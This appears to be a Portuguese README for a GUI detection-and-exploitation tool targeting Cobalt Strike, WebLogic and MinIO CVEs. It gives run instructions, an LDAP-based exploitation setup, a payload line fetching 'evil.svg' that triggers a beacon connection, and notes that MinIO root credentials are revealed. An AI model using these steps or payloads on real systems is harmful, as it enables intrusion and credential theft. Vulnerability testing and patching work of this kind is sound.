
Uma ferramenta de teste para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Uma ferramenta de teste para CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432
Ferramenta de detecção e exploração de vulnerabilidades com interface gráfica para essas três vulnerabilidades
Para executar o jar, é necessário Java 8
Destinado a um único alvo, não adequado para varredura de múltiplos IPs
Ao empacotar, a exploração da vulnerabilidade Weblogic precisa referenciar wlfullclient.jar, que deve ser adicionado manualmente
java -jar Gui-poc-test.jar
Modo de uso: há dois botões, "Detectar" e "Explorar". O uso varia conforme a vulnerabilidade, com dicas na interface da ferramenta
Insira o alvo, sem necessidade de porta (padrão 9000, ajustável, veja no código fonte GuiDemo.java:linha144)
Exibe MINIO_ROOT_USER e MINIO_ROOT_PASSWORD, entre outros
Insira IP do alvo, porta e endereço do servidor LDAP
Detecção:
Nota: A exploração da vulnerabilidade requer configurar seu próprio servidor LDAP (público)
Exemplo de payload:
beacon.exe http://127.0.0.1:4444/evil.svg
Resultado: o trojan é executado no windows e o cliente CS no mac faz a conexão
Ao mesmo tempo, o CS executa o conteúdo do jar e abre a calculadora
O windows registra o endereço de acesso do CS
Princípios: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md
https://github.com/4ra1n/CVE-2023-21839
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
https://github.com/its-arun/CVE-2022-39197
Patch do CS: https://github.com/burpheart/CVE-2022-39197-patch